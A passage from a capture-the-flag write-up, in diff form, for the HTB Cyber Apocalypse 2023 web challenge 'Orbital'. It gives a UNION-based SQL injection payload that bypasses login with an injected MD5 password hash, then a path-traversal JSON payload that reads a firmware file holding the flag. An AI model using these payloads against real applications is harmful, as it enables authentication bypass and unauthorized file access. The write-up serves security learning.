Ramoreik/HTB-CTF-CyberApocalypse-2023-writeups/web/orbital.md

     else: return False
 ```

 This means that we have to provide the password hashed with `md5` in our payload.

 Payload:

 ```
 owned" UNION SELECT "admin","21232f297a57a5a743894a0e4a801fc3" FROM users;#
 ```

-`admin`: is the target user
+`admin`: is the target user.
-`21232f297a57a5a743894a0e4a801fc3`: is the md5 hash of "admin"
+`21232f297a57a5a743894a0e4a801fc3`: is the md5 hash of "admin".

 When logging in we provide the injection in the username input and the password 'admin' in the password input.

 Here is the resulting query executing on the database:

 ```sql
 SELECT username, password FROM users WHERE username = "owned" UNION SELECT "admin", "21232f297a57a5a743894a0e4a801fc3" FROM users;#"
 ```

 When executing, the database will not return results for the `owned` username, which means it will use our specified row.

 ![](/images/orbital_login.png)

 We are then logged into a dashboard:

 ![](/images/orbital_dashboard.png)

 ##### LFI in export function

 In this dashboard, there is an export function for various communications.

 ![](/images/orbital_export.png)

 The application has an export api that relatively includes an mp3 file.
 This file is then downloaded.

 By using path traversal, we can traverse the filesystem back to the root directory to include our target `signal_sleuth_firmware`.

 ![](/images/orbital_export_request.png)

 With the following payload:

 ```json
 {
     "name":"../../../../../../../../../../../signal_sleuth_firmware"
 }
 ```

 Once we obtain this file, it contains the flag !

 #### Script
 ```python